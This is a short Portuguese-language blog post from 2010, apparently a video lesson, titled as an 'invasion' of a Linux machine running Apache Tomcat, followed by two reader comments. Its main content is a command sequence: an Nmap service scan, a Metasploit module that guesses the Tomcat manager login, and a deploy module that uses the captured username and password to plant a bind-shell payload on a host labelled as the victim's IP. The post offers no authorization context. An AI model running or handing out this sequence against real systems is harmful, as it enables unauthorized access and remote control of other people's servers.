Invasão em micro Linux

Posted: 30 maio 2010 by Bhior in Marcadores: ,
2

Nessa aula mostro como explorar um serviço rodando em um micro Linux. O serviço era do apache tomcat. Para maiores informações do mesmo clique aqui!

O que eu fiz?
Escanei o host com o Nmap,
verifiquei os serviço,
fiz um scanner com o metasploit para verifica vulnerabilidade do login, peguei o login e senha e injetei o exploit.

Comandos:


Citação:

nmap -sV host
use scanner/http/tomcat_mgr_login
set rhost Ip_da_vitima
set rport 8180
exploit

use multi/http/tomcat_mgr_deploy
set rhost Ip_da_vitima
set username Login_capturado
set passwoer Senha_capturada
set rport 8180
set payload linux/x86/shell_bind_tcp
exploit
Programas usados:
Metasploit
Nmap

Ambiente da aula e em uma distro Linux, lembrando que pode ser em qualquer sistema operacional que rode o metasploit.

Obs: O pessoal ja engessou que sistema operacional linux e seguro que Windows e vulnerável. O Linux da uma camada a mais de segurança, mas possui vulnerabilidades também. Sempre atualize.

Baixar:

Assisti on-line:

Citação:

http://bhior.blip.tv/file/3689430

2 comentários:

  1. Anônimo says:

    louco de mais

  1. Anônimo says:

    Bhior, muito bom! se puder disponibilizar mais da série invasão em linux.

    OBRIGADO!
    abraço.